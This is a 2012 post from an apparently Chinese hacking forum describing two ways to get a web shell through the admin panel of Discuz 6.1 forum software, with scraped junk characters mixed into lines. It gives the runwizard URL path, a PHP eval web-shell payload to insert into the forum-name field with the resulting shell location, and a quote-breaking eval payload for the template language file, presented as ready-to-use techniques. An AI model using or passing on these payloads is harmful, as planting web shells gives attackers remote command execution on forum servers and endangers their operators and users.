找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2337|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell
! j6 M/ T- r  D" P好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
6 G6 l9 U% S; B0 s1:
2 F- c  {6 B7 v6 zhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes# N; J! ~( V) n
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell9 R+ ]7 A3 {- [! z+ T$ m
<?php eval($_POST[cmd]);?>' _: P# s2 x5 P- J
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
8 u0 `1 u6 p0 B' E; L+ H" j% u' @) Y+ v; R
/ @8 w2 U5 {$ l+ D) ]
2:后台模板管理--默认模板套系--详情4 X8 ]6 ~: L3 J
templates/default/actions.lang.php1 e2 n- M; t; ~6 Z7 Z. X
jhackj\\');eval($_POST[cmd])?>;//
' Q, q# y/ Z# m2 h* A4 |) U7 i% q# }# v+ l. X) i  K5 o/ i" a4 z1 O
利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表